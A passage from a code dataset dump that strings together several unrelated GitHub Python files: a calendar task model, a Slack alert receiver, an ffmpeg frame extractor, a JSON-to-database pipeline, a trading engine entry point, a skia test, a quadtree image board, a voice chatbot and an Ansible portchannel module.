'repetition_type': self.repetition_type,\n 'repetition_subtype': self.repetition_subtype\n }\n\n def __repr__(self):\n return json.dumps(self.long())\n\n @staticmethod\n def _add_task_to_task_list(tasks_list, day, month, task, view_past_tasks=True):\n if not view_past_tasks:\n # Check if this task should be hidden\n start_time = datetime.now()\n task_end_time = datetime(start_time.year, month, day, task.end_time.hour, task.end_time.minute, task.end_time.second)\n if task_end_time < start_time:\n return\n if month not in tasks_list:\n tasks_list[month] = {}\n if day not in tasks_list[month]:\n tasks_list[month][day] = []\n tasks_list[month][day].append(task)\n\n @staticmethod\n def getTasks(calendar_id, year, month, view_past_tasks):\n tasks = {}\n if True:\n if view_past_tasks:\n m, y = Calendar.previous_month_and_year(year, month)\n start_time = datetime(y, m, 24)\n else:\n start_time = datetime.now()\n m, y = Calendar.next_month_and_year(year, month)\n end_time = datetime(y, m, 6)\n\n # Query and add non recurrent tasks\n tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n Task.is_recurrent == False,\n Task.end_time >= start_time,\n Task.start_time < end_time\n ).all()\n for task in tasks_query:\n task_day = task.start_time.day\n task_month = task.start_time.month\n Task._add_task_to_task_list(tasks, task_day, task_month, task)\n\n # Query and add recurrent tasks\n recurrent_tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n Task.is_recurrent == True,\n extract('year', Task.start_time) == year\n ).all()\n for task in recurrent_tasks_query:\n monthly_repetition_done = False\n for week in Calendar.month_days_with_weekday(year, month):\n for weekday, day in enumerate(week):\n if day == 0:\n continue\n if task.repetition_type == 'w':\n # Weekly repetition: repetition_value is a week day\n if task.repetition_value == weekday:\n Task._add_task_to_task_list(tasks, day, month, task, view_past_tasks)\n elif task.repetition_type == 'm':\n if task.repetition_subtype == 'w':\n # Monthly repetition: repetition_value is a week day\n if task.repetition_value == weekday and not monthly_repetition_done:\n Task._add_task_to_task_list(tasks, day, month, task, view_past_tasks)\n monthly_repetition_done = True\n elif task.repetition_subtype == 'm':\n # Monthly repetition: repetition_value is a day\n if task.repetition_value == day:\n Task._add_task_to_task_list(tasks, day, month, task, view_past_tasks)\n else:\n today = datetime.today()\n today = datetime(today.year, today.month, today.day)\n #last_day = Calendar.month_days(year, month)\n\n if view_past_tasks:\n past_tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n Task.is_recurrent == False,\n Task.start_time < today,\n extract('year', Task.start_time) == year\n ).all()\n\n for el in past_tasks_query:\n task_day = el.start_time.day\n task_month = el.start_time.month\n if task_month not in tasks:\n tasks[task_month] = {}\n if task_day not in tasks[task_month]:\n tasks[task_month][task_day] = []\n # tasks[str(month)][str(task_day)].append(el)\n tasks[task_month][task_day].append(el)\n\n upcoming_tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n Task.is_recurrent == False,\n Task.start_time >= today,\n extract('year', Task.start_time) == year,\n extract('month', Task.start_time) == month\n ).all()\n #upcoming_tasks_query = Task.query.filter(Task.calendar_id == calendar_id).all()\n\n for el in 
upcoming_tasks_query:\n task_day = el.start_time.day\n task_month = el.start_time.month\n if task_month not in tasks:\n tasks[task_month] = {}\n if task_day not in tasks[task_month]:\n tasks[task_month][task_day] = []\n # tasks[str(month)][str(task_day)].append(el)\n tasks[task_month][task_day].append(el)\n\n recurrent_tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n Task.is_recurrent == True,\n extract('year', Task.start_time) == year\n ).all()\n\n return tasks\n\n # @staticmethod\n # def getTask(calendar_id, task_id, is_recurrent, year, month, day):\n # if is_recurrent:\n # tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n # Task.id == task_id,\n # Task.is_recurrent == is_recurrent\n # ).all()\n # else:\n # tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n # Task.id == task_id,\n # extract('year', Task.start_time) == year,\n # extract('month', Task.start_time) == month,\n # extract('day', Task.start_time) == day\n # ).all()\n # if len(tasks_query) == 0:\n # return None\n # return vars(tasks_query[0])\n\n @staticmethod\n def getTask(task_id):\n return Task.query.get(task_id)\n\n '''\n insert()\n inserts a new model into a database\n the model must have a unique name\n the model must have a unique id or null id\n EXAMPLE\n drink = Drink(title=req_title, recipe=req_recipe)\n drink.insert()\n '''\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n '''\n delete()\n deletes a new model into a database\n the model must exist in the database\n EXAMPLE\n drink = Drink(title=req_title, recipe=req_recipe)\n drink.delete()\n '''\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n '''\n update()\n updates a new model into a database\n the model must exist in the database\n EXAMPLE\n drink = Drink.query.filter(Drink.id == id).one_or_none()\n drink.title = 'Black Coffee'\n drink.update()\n '''\n def update(self):\n db.session.commit()\n","repo_name":"kilauea/FSND-capstone","sub_path":"app/mod_calendar/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12148585013","text":"import requests\nfrom typing import List, Dict, Optional\n\nfrom . 
import BaseReceiver\nfrom ..rule import Rule\n\n\nclass SlackReceiver(BaseReceiver):\n    def __init__(\n        self,\n        url: str,\n        username: str,\n        icon_emoji: str = \":robot_face:\",\n        channel: Optional[str] = None,\n        icon_url: Optional[str] = None,\n    ):\n        self._url = url\n        self._username = username\n        self._icon_emoji = icon_emoji\n        self._channel = channel\n        self._icon_url = icon_url\n        super().__init__()\n\n    def post(\n        self,\n        rule: Rule,\n        result: List[Dict],\n    ):\n        payload = dict()\n        if self._username:\n            payload[\"username\"] = self._username\n        if self._icon_url:\n            payload[\"icon_url\"] = self._icon_url\n        if self._icon_emoji:\n            payload[\"icon_emoji\"] = self._icon_emoji\n        if self._channel:\n            payload[\"channel\"] = self._channel\n\n        pretext = f\"Chain: `{rule.chain}` RuleID: `{rule.id}`\"\n\n        message = [f\"Rule description: `{rule.description}`\"]\n        for item in result:\n            labels = [\n                f\"{k.title()}: `{v}`\" for k, v in rule.labels.format(item).items()\n            ]\n            message.extend(labels)\n            message.append(rule.output.format(item))\n        msg = \"\\n\".join(message)\n\n        payload[\"attachments\"] = [\n            {\n                \"color\": \"info\",\n                \"fields\": [{\"title\": \"Chain Alert\", \"value\": msg, \"short\": False}],\n                \"pretext\": pretext,\n                \"fallback\": pretext,\n            }\n        ]\n\n        requests.post(self._url, json=payload)\n","repo_name":"jsvisa/blockchain-etl","sub_path":"blockchainetl/alert/receivers/slack_receiver.py","file_name":"slack_receiver.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"2959886486","text":"import os, sys, shutil\nimport os.path as osp\nimport subprocess as sp\nimport general_utils as gnu\n\n\ndef extract_frame(video_dir, frame_dir):\n    for file in os.listdir(video_dir):\n        if file.endswith((\".mov\", \".mp4\")):\n            file_path = osp.join(video_dir, file)\n            file_name = file[:-4]\n            # if file_name != 'legao_02_01': continue\n            res_dir = osp.join(frame_dir, file_name)\n            gnu.build_dir(res_dir)\n            command = f\"ffmpeg -i {file_path} {res_dir}/{file_name}_%05d.png\"\n            command = command.split()\n            sp.run(command)\n\n\ndef main():\n    root_dir = \"./sample_data/\"\n\n    video_dir = osp.join(root_dir, \"videos\")\n    frame_dir = osp.join(root_dir, \"frames\")\n    gnu.renew_dir(frame_dir)\n\n    extract_frame(video_dir, frame_dir)\n\nif __name__ == '__main__':\n    main()","repo_name":"facebookresearch/frankmocap","sub_path":"mocap_utils/extract_frame.py","file_name":"extract_frame.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":2052,"dataset":"github-code","pt":"60"} +{"seq_id":"6421932622","text":"from database_utils import bulk_add_details,bulk_add_graphs,bulk_add_five_minute_averages\nimport datetime\nimport logging\n\ndef create_detail_key(\n    id:str,\n    time_extracted:str = None\n) -> str:\n    \"\"\"\n    Generate an n-character hash key + a timestamp separated by a '-' character to be used as primary key\n    for the details table.\n\n    Parameters:\n    id (str): Hash id of json file\n    timestamp (str): datetime extraction of json contents in YYMMDDHHmm form\n\n    Returns:\n    id+'-'+time_extracted (str): A string concatenation to be used as a primary key in a database\n    \"\"\"\n    \n    # compute the timestamp at call time (a default argument would be evaluated only once, at import)\n    if time_extracted is None:\n        time_extracted = datetime.datetime.now().strftime(\"%y%m%d%H%M\")\n    return id+'-'+time_extracted\n\ndef create_five_minute_average_key(\n    id:str,\n    time_extracted:str = None\n) -> str:\n    \"\"\"\n    Generate an n-character hash key + a timestamp separated by a 
'-' character to be used as primary key\n    for the five minute averages table.\n\n    Parameters:\n    id (str): Hash id of json file\n    timestamp (str): datetime extraction of json contents in YYMMDDHHmm form\n\n    Returns:\n    id+'-'+time_extracted (str): A string concatenation to be used as a primary key in a database\n    \"\"\"\n    \n    # compute the timestamp at call time (a default argument would be evaluated only once, at import)\n    if time_extracted is None:\n        time_extracted = datetime.datetime.now().strftime(\"%y%m%d%H%M\")\n    return id+'-'+time_extracted\n\n\ndef create_graph_key(\n    id:str,\n    timestamp:str,\n) -> str:\n    \"\"\"\n    Generate an n-character hash key + a timestamp in milliseconds separated by a '-' character to be used as primary key\n    for the graphs table.\n\n    Parameters:\n    id (str): Hash id of json file\n    timestamp (str): timestamp in milliseconds since January 1st 1970\n\n    Returns:\n    id+'-'+ timestamp (str): A string concatenation to be used as a primary key in a database\n    \"\"\"\n    \n    return id+'-'+timestamp\n\n\ndef extract_row_tuple_details(\n    data:dict,\n    id:str\n) -> tuple:\n    \"\"\"\n    Extract all keys from a single dictionary entry and return it as a 16-tuple.\n\n    Parameters:\n    data (dict): A raw json file\n    id (str): Hash id of raw json file in the first argument\n\n    Returns:\n    (\n        primary_key,\n        type,\n        item_id,\n        name,\n        description,\n        members,\n        current_trend,\n        current_price,\n        today_trend,\n        today_price,\n        day30_trend,\n        day30_change,\n        day90_trend,\n        day90_change,\n        day180_trend,\n        day180_change\n    ) (tuple): A 16-tuple to be used in bulk_process_json\n    \"\"\"\n\n    # extract all keys from 1 dictionary entry\n    item_id = data['item']['id']\n    type = data['item']['type']\n    name = data['item']['name']\n    description = data['item']['description']\n    current_trend = data['item']['current']['trend']\n    current_price = data['item']['current']['price']\n    today_trend = data['item']['today']['trend']\n    today_price = data['item']['today']['price']\n    members = data['item']['members']\n    day30_trend = data['item']['day30']['trend']\n    day30_change = data['item']['day30']['change']\n    day90_trend = data['item']['day90']['trend']\n    day90_change = data['item']['day90']['change']\n    day180_trend = data['item']['day180']['trend']\n    day180_change = data['item']['day180']['change']\n    primary_key = create_detail_key(id)\n\n    # return extracted keys\n    return (\n        primary_key,\n        type,\n        item_id,\n        name,\n        description,\n        members,\n        current_trend,\n        current_price,\n        today_trend,\n        today_price,\n        day30_trend,\n        day30_change,\n        day90_trend,\n        day90_change,\n        day180_trend,\n        day180_change\n    )\n\ndef extract_list_tuple_graphs(\n    data:dict,\n    id:str\n) -> list:\n    \"\"\"\n    Extract all keys and values from a graphs json as a list of 4-tuples.\n\n    Parameters:\n    data (dict): A raw json file\n    id (str): Hash id of raw json file in the first argument\n\n    Returns:\n    graph_values (list): a list of 4-tuples containing the first sale price and 30 day average at a given timestamp\n    in the order (primary key, timestamp, first sale price, 30 day average) for each tuple\n    \"\"\"\n\n    # split data into daily and average keys to make extracting values easier\n    daily = data['daily']\n    average = data['average']\n    \n    # extract all timestamps by getting the keys of either daily or average\n    # picking either is okay as the timestamps are in line with each other\n    timestamps = list(daily.keys())\n    first_sale_prices = list(daily.values())\n    average_30_days = list(average.values())\n\n    graph_values = []\n\n    # place all values into a list of tuples with the addition of a primary key\n    for timestamp in range(180):\n        primary_key = create_graph_key(id,timestamps[timestamp])\n        
graph_values.append((primary_key,timestamps[timestamp],first_sale_prices[timestamp],average_30_days[timestamp]))\n \n # return extracted keys\n return graph_values\n\ndef extract_row_tuple_five_minute_average(\n data:dict,\n id:str\n) -> tuple:\n \"\"\"\n Extract all keys from a single dictionary entry and return it as a 5-tuple.\n\n Parameters:\n data (dict): A raw json file\n id (str): Hash id of raw json file in the first argument\n\n Returns:\n (\n primary_key,\n average_high_price,\n high_price_volume,\n average_low_price,\n low_price_volume\n ) (tuple): A 5-tuple to be used in bulk_process_json\n \"\"\"\n \n # extract all values from json keys and generate primary key\n primary_key = create_five_minute_average_key(id)\n average_high_price = data['avgHighPrice']\n high_price_volume = data['highPriceVolume']\n average_low_price = data['avgLowPrice']\n low_price_volume = data['lowPriceVolume']\n\n # return 5-tuple for later insertion into database table\n return (\n primary_key,\n average_high_price,\n high_price_volume,\n average_low_price,\n low_price_volume\n )\n\ndef log_id(\n id:str,\n table:str\n) -> None:\n \n \"\"\"\n Log each row insertion into database for debugging purposes.\n\n Parameters:\n id (str): Hash id of raw json file passed into bulk_process_json\n table (str): Table name where json entries will be inserted\n \"\"\"\n \n # keep track of hash id in case of debugging needs\n logging.basicConfig(format=\"%(asctime)s - %(message)s\",level=logging.INFO)\n logging.info(f'id: {id} inserted into {table} table')\n\ndef bulk_process_detail_json(\n database:str,\n raw_json:dict,\n id:str\n) -> None:\n \n \"\"\"\n Add a row of json entries into a database \n\n Parameters:\n database (str): Database name \n raw_json (dict): Raw json response fetched from API call\n id (str): Hash id of raw json file\n \"\"\"\n \n data = extract_row_tuple_details(raw_json,id)\n\n # add all values of a row into the details table\n bulk_add_details(data,database)\n\n log_id(data[0],\"details\")\n\ndef bulk_process_graph_json(\n database:str,\n raw_json:dict,\n id:str\n) -> None:\n \"\"\"\n Add 180 rows of json entries into a database \n\n Parameters:\n database (str): Database name \n raw_json (dict): Raw json response fetched from API call\n id (str): Hash id of raw json file\n \"\"\"\n data = extract_list_tuple_graphs(raw_json,id)\n\n # add all values of a row into the details table\n \n for row in data:\n bulk_add_graphs(row,database)\n log_id(row,\"graphs\")\n\ndef bulk_process_five_minute_average_json(\n database:str,\n raw_json:dict,\n id:str\n) -> None:\n \"\"\"\n Add a rows of json entries into a database \n\n Parameters:\n database (str): Database name \n raw_json (dict): Raw json response fetched from API call\n id (str): Hash id of raw json file\n \"\"\"\n data = extract_row_tuple_five_minute_average(raw_json,id)\n\n # add all values of a row into the details table\n bulk_add_five_minute_averages(data,database)\n log_id(data[0],\"five minute averages\")","repo_name":"aung-st/OSRS-Bond-Tracking","sub_path":"src/process_json.py","file_name":"process_json.py","file_ext":"py","file_size_in_byte":7896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71857773599","text":"import asyncio\nimport multiprocessing\nimport os\nimport sys\nfrom time import perf_counter\n\nimport optuna\n\nfrom cli.arg_parse import execute_for_args\nfrom cli.checks.engine_use_statistics import engine_statistics\nfrom cli.checks.latest_version import 
import print_warning_if_version_outdated\nfrom cli.prepare_workspace import prepare_workspace\nfrom cli.print_utils import print_debug, is_verbosity\nfrom main_controller import MainController\nfrom utils.utils import check_internet_connection, prepend_resource_dir\n\n# Hack, PyInstaller + rich on Windows in GitHub actions fails because it cannot find encoding of stdout, this sets\n# it on stdout if not set\n\nos.environ[\"PYTHONIOENCODING\"] = \"utf-8\"\nPYTHONIOENCODING = os.environ.get(\"PYTHONIOENCODING\", False)\nif sys.stdout.isatty() is False and PYTHONIOENCODING is not False and sys.stdout.encoding != PYTHONIOENCODING:\n    sys.stdout = open(sys.stdout.fileno(), 'w', encoding='utf-8', closefd=False)\n\nRUNFOLDER = os.path.dirname(os.path.realpath(__file__))\n\n\ndef main(online: bool):\n    if online:\n        print_warning_if_version_outdated()\n    execute_for_args({\n        'init': run_init,\n        'default': run_engine\n    }, online)\n    if online:\n        print_warning_if_version_outdated()\n\n\ndef run_engine(args, online: bool):\n    if online:\n        engine_statistics(args.no_statistics)\n\n    if args.resources:\n        prepend_resource_dir(args)\n\n    controller = MainController()\n    asyncio.run(controller.run(args, online))\n\n\ndef run_init(args, _):\n    prepare_workspace(args)\n\n\nif __name__ == \"__main__\":\n    multiprocessing.freeze_support()\n    if not is_verbosity(verbosity=\"debug\"):\n        optuna.logging.set_verbosity(optuna.logging.WARNING)\n    connection_status = check_internet_connection()\n    start_time = perf_counter()\n    main(connection_status)\n    end_time = perf_counter()\n    print_debug(f\"Elapsed time: {end_time - start_time}s\")\n","repo_name":"dema-trading-ai/engine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"51"} +{"seq_id":"29135910359","text":"import skia\nimport pytest\n\n\ndef draw(canvas):\n    from math import cos, sin\n    scale = 256.\n    R = 0.45 * scale\n    TAU = 6.2831853\n\n    path = skia.Path()\n    path.moveTo(R, 0.)\n    for i in range(7):\n        theta = 3 * i * TAU / 7\n        path.lineTo(R * cos(theta), R * sin(theta))\n    path.close()\n\n    paint = skia.Paint()\n    paint.setAntiAlias(True)\n\n    canvas.clear(0xFFFFFFFF)\n    canvas.translate(0.5 * scale, 0.5 * scale)\n    canvas.drawPath(path, paint)\n\n\ndef test_skia():\n    surface = skia.Surface(256, 256)\n    canvas = surface.getCanvas()\n    draw(canvas)\n    image = surface.makeImageSnapshot()\n    data = image.encodeToData()\n    encoded = bytes(data)\n","repo_name":"kyamagu/skia-python","sub_path":"tests/test_skia.py","file_name":"test_skia.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"51"} +{"seq_id":"37831313841","text":"import copy\nimport math\nimport numpy as np\nimport scipy.misc as smp\nimport random\n\n\n# if end when the whole space is split, the image is pretty much just noise, maybe end after a number of steps\n# generate probabilities from discriminator or network?\n\n# if width and height are 1s remove from possible nodes and add to archived nodes\n\ndef softmax(x):\n\tprobs = np.exp(x - np.max(x))\n\tprobs /= np.sum(probs)\n\treturn probs\n\n\nclass Board(object):\n\n\t# Board for the game\n\n\tdef __init__(self, width, height):\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.data = np.zeros((width,height), dtype=np.uint8)\n\t\t# self.act_probs = softmax(gradient)\n\t\tself.nodes = {(0,0): [width, height, False]} #last parameter means been inverted or not\n\t\t# 
self.n_unit_node = 0\n\n\tdef copy(self):\n\t\tc = Board(self.width, self.height)\n\t\tc.data = self.data.copy()\n\t\tc.nodes = self.nodes.copy()\n\t\treturn c\n\t\n\tdef update(self, action):\n\t\t# action is element from [0,1,2,3,4] 0 meaning invert whole square, 1 invert top left, 2 top right, 3 bottom left, 4 bottom right\n\t\tloc, loc_action = action\n\t\tx, y = loc\n\t\twidth, height, already_inverted = self.nodes[loc]\n\n\t\tif loc_action==0:\n\t\t\tx1, x2, y1, y2 = x, x+width, y, y+height\n\t\t\t# if width==1 or height==1:\n\t\t\t# \tself.nodes.pop((x1,y1), None)\n\t\t\t# else:\n\t\t\tself.nodes[(x1,y1)] = [width, height, True]\n\t\telse:\n\t\t\tif loc_action==1:\n\t\t\t\tx1, x2, y1, y2 = x, x+width//2, y, y+height//2\n\t\t\t\tself.nodes[(x2,y1)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x1,y2)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x2,y2)] = [width//2, height//2, False]\n\n\t\t\telif loc_action==2:\n\t\t\t\tx1, x2, y1, y2 = x+width//2, x+width, y, y+height//2\n\t\t\t\tself.nodes[(x,y1)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x,y2)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x1,y2)] = [width//2, height//2, False]\n\n\t\t\telif loc_action==3:\n\t\t\t\tx1, x2, y1, y2 = x, x+width//2, y+height//2, y+height\n\t\t\t\tself.nodes[(x1,y)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x2,y)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x2,y1)] = [width//2, height//2, False]\n\n\t\t\telse:\n\t\t\t\tx1, x2, y1, y2 = x+width//2, x+width, y+height//2, y+height\n\t\t\t\tself.nodes[(x,y1)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x,y)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x1,y)] = [width//2, height//2, False]\n\n\t\t\tself.nodes[(x1,y1)] = [width//2, height//2, True]\n\n\n\t\tfor i in range(x1, x2):\n\t\t\tfor j in range(y1, y2):\n\t\t\t\tif self.data[i,j]==0:\n\t\t\t\t\tself.data[i,j] = 255\n\t\t\t\telse:\n\t\t\t\t\tself.data[i,j] = 0\n\n\tdef get_actions(self, grad=None):\n\t\tactions = []\n\t\tfor loc, loc_v in self.nodes.items():\n\t\t\twidth, height, already_inverted = loc_v\n\t\t\tif not already_inverted:\n\t\t\t\tactions.append((loc, 0))\n\t\t\tif width > 1 and height > 1:\n\t\t\t\tfor i in range(1,5):\n\t\t\t\t\tactions.append((loc, i))\n\t\tprob = 1/len(actions) if actions else 0\n\t\tactions = [(a, prob) for a in actions]\n\t\treturn actions\n\n\n\tdef update_random(self):\n\t\t# loc = random.sample(self.nodes.keys(),1)[0]\n\t\t# width, height, already_inverted = self.nodes[loc]\n\t\t# if already_inverted:\n\t\t# \tloc_action = random.randint(1,4)\n\t\t# elif width==1 or height==1:\n\t\t# \tloc_action = 0\n\t\t# else:\n\t\t# \tloc_action = random.randint(0,4)\n\t\tactions = self.get_actions()\n\t\tif True:\n\t\t\taction, prob = random.sample(actions, 1)[0]\n\t\t\tself.update(action)\n\n\n\tdef end(self):\n\t\tif len(self.nodes)>128:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef visualize(self):\n\t\tdata = self.data\n\t\twidth = self.width\n\t\theight = self.height\n\t\ttemp = np.zeros( (width,height,3), dtype=np.uint8 )\n\t\tfor i in range(width):\n\t\t\tfor j in range(height):\n\t\t\t\tfor k in range(3):\n\t\t\t\t\ttemp[i][j][k] = data[i][j]\n\t\timg = smp.toimage( temp )\n\t\timg.show()\n\n\n\t\n# size = 28\n# # gradient = np.random.choice([-1, 0, 1], size=(size,size))\n\n# image = Board(size, size)\n# for i in range(30):\n# \timage.start_play()\n# \tprint(len(image.nodes))\n\n# 
image.visualize()","repo_name":"mitchgu/MCTSGen","sub_path":"quadtree.py","file_name":"quadtree.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20981003198","text":"# One person is at kilometer 70 of a road, another is\r\n# at km 150; the cars head in opposite directions and travel at the same speed.\r\n# Write a program to determine at which kilometer of that road they will meet.\r\n\r\n# Variable giving the km where car 1 is\r\ncoche1=70\r\n# Variable giving the km where car 2 is\r\ncoche2=150\r\n# While car 1's km is not equal to car 2's km,\r\n# add one to car 1 and subtract one from car 2,\r\n# so that when their km coincide it is reported\r\nwhile coche1!=coche2:\r\n    coche1 += 1\r\n    coche2 -= 1\r\nprint(\"Both cars have met at km: \",coche2)","repo_name":"alber122/PYTHON_EIABD","sub_path":"B3/Ejer14.py","file_name":"Ejer14.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16631792373","text":"import pyttsx3\nimport speech_recognition as sr\nimport random\n\n\"\"\" A small Python chatbot for some college information\n    e.g. questions:\n    1. Hello\n    2. Who is HOD of Physics Department\n    3. Where is PPS Department\n\"\"\"\n\ndef sayText(text):\n    tts = pyttsx3.init()\n    tts.setProperty('rate', 150)\n    tts.say(text)\n    print(text + \"\\n\")\n    tts.runAndWait()\n\n\ndef recognitionText():\n    r = sr.Recognizer()\n    with sr.Microphone() as source:\n        r.adjust_for_ambient_noise(source)\n        r.pause_threshold = 1\n        print(\"Listening...\")\n        audio = r.listen(source)\n    try:\n        text = r.recognize_google(audio)\n        print(text)\n        return text\n    except:\n        sayText(\"Sorry I didn't understand...\")\n\n\ndef checker(text, find):\n    for x in find:\n        if text.__contains__(x):\n            return x\n        else:\n            continue\n\n\nentering = ['hi', 'hello there', 'hello', 'hey', 'hey', 'hai']\nexiting = ['okay thanks', 'bye', 'good day', 'thanks']\nsecondary = ['Physics', 'physics', 'chemistry',\n             'Chemistry', 'pps', 'PPS', 'Maths', 'maths']\nmain = ['HOD', 'department', 'Department']\n\n\nwhile True:\n    text = recognitionText()\n    # recognitionText() returns None when recognition fails, so skip this turn\n    if text is None:\n        continue\n\n    checkerMain = checker(text, main)\n    checkerSecondary = checker(text, secondary)\n\n    if text in entering:\n        sayText(random.choice(entering))\n\n    elif checkerMain == 'department' or checkerMain == 'Department':\n\n        if checkerSecondary == 'Physics' or checkerSecondary == 'physics':\n            sayText('Physics Department is in A Block')\n        elif checkerSecondary == 'chemistry':\n            sayText('Chemistry Department is in D Block')\n        elif checkerSecondary == 'maths' or checkerSecondary == 'Maths':\n            sayText('Maths Department is in B Block')\n        elif checkerSecondary == 'pps' or checkerSecondary == 'PPS':\n            sayText('PPS Department is in C Block')\n        else:\n            sayText('I don\\'t know the answer...exiting')\n            break\n\n    elif checkerMain == 'HOD':\n\n        if checkerSecondary == 'Physics' or checkerSecondary == 'physics':\n            sayText('Ram is HOD of physics department')\n        elif checkerSecondary == 'chemistry' or checkerSecondary == 'Chemistry':\n            sayText('Sita is HOD of chemistry department')\n        elif checkerSecondary == 'maths' or checkerSecondary == 'Maths':\n            sayText('Kailash is HOD of maths department')\n        elif checkerSecondary == 'pps' or checkerSecondary == 'PPS':\n            sayText('Kavita is HOD of PPS department')\n        else:\n            sayText('I don\\'t know 
the answer...exiting')\n break\n\n elif text in exiting:\n sayText(random.choice(exiting))\n break\n \n else:\n sayText('I don\\'t know the answer...exiting')\n break","repo_name":"Stargent-Robotics-Community/Prateek-Singh","sub_path":"Assignment-chatbot/chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"3903785764","text":"#!/usr/bin/env python\n\nfrom ansible.module_utils.basic import AnsibleModule\nimport jinja2\nimport traceback\nimport re\nimport os\nimport time\nDOCUMENTATION = '''\nmodule: ptf_portchannel\n\nshort_description: manage portchannel interface in PTF container\ndescription: start/stop portchannel interface in PTF container with certain configurations\n\nOptions:\n - option-name: cmd\n description: An action string as [start|stop]\n required: True\n - option-name: portchannel_config\n description: A dict to indicate the portchannel configuration. E.G. {\"PortChannel101\": {\"intfs\": [0, 4]}}\n required: True\n'''\n\n\nEXAMPLES = '''\n- name: Start PTF portchannel\n ptf_portchannel:\n cmd: \"start\"\n portchannel_config: \"{{ portchannel_config }}\"\n'''\n\n\nportchannel_conf_path = \"/etc/portchannel\"\n\n\nportchannel_conf_tmpl = '''\\\n{\n \"device\": \"{{ name }}\",\n \"runner\": {\n \"active\": true,\n \"name\": \"lacp\",\n \"min_ports\": 1\n },\n \"ports\": {\n{%- for intf in intfs %}\n \"{{ intf }}\": {}{{ \",\" if not loop.last else \"\" }}\n{%- endfor %}\n }\n}\n'''\n\n\nportchannel_supervisord_path = \"/etc/supervisor/conf.d\"\n\n\nportchannel_supervisord_conf_tmpl = '''\\\n[program:portchannel-{{ name }}]\ncommand=/usr/bin/teamd -r -t {{ name }} -f ''' + portchannel_conf_path + '''/{{ name }}.conf\nstdout_logfile=/tmp/portchannel-{{ name }}.out.log\nstderr_logfile=/tmp/portchannel-{{ name }}.err.log\nredirect_stderr=false\nautostart=true\nautorestart=true\nstartsecs=1\nnumprocs=1\n'''\n\n\ndef exec_command(module, cmd, ignore_error=False, msg=\"executing command\"):\n rc, out, err = module.run_command(cmd)\n if not ignore_error and rc != 0:\n module.fail_json(msg=\"Failed %s: rc=%d, out=%s, err=%s\" %\n (msg, rc, out, err))\n return out\n\n\ndef get_portchannel_status(module, name):\n output = exec_command(\n module, cmd=\"supervisorctl status portchannel-%s\" % name)\n m = re.search(r'^([\\w|-]*)\\s+(\\w*).*$', output.decode(\"utf-8\"))\n return m.group(2)\n\n\ndef refresh_supervisord(module):\n exec_command(module, cmd=\"supervisorctl reread\", ignore_error=True)\n exec_command(module, cmd=\"supervisorctl update\", ignore_error=True)\n\n\ndef parse_teamd_config(module, portchannel_config):\n conf = []\n for name, intfs in portchannel_config.items():\n intfs_names = []\n if not intfs[\"intfs\"]:\n continue\n for intf in intfs[\"intfs\"]:\n intfs_names.append(\"eth\" + str(intf))\n conf.append({\"name\": name, \"intfs\": intfs_names})\n return conf\n\n\ndef create_teamd_conf(module, teamd_config):\n t = jinja2.Template(portchannel_conf_tmpl)\n for conf in teamd_config:\n with open(os.path.join(portchannel_conf_path, \"{}.conf\".format(conf[\"name\"])), 'w') as fd:\n fd.write(t.render(conf))\n\n\ndef remove_teamd_conf(module, teamd_config):\n for conf in teamd_config:\n try:\n os.remove(os.path.join(portchannel_conf_path,\n \"{}.conf\".format(conf[\"name\"])))\n except Exception:\n pass\n\n\ndef create_supervisor_conf(module, teamd_config):\n t = jinja2.Template(portchannel_supervisord_conf_tmpl)\n for conf in teamd_config:\n 
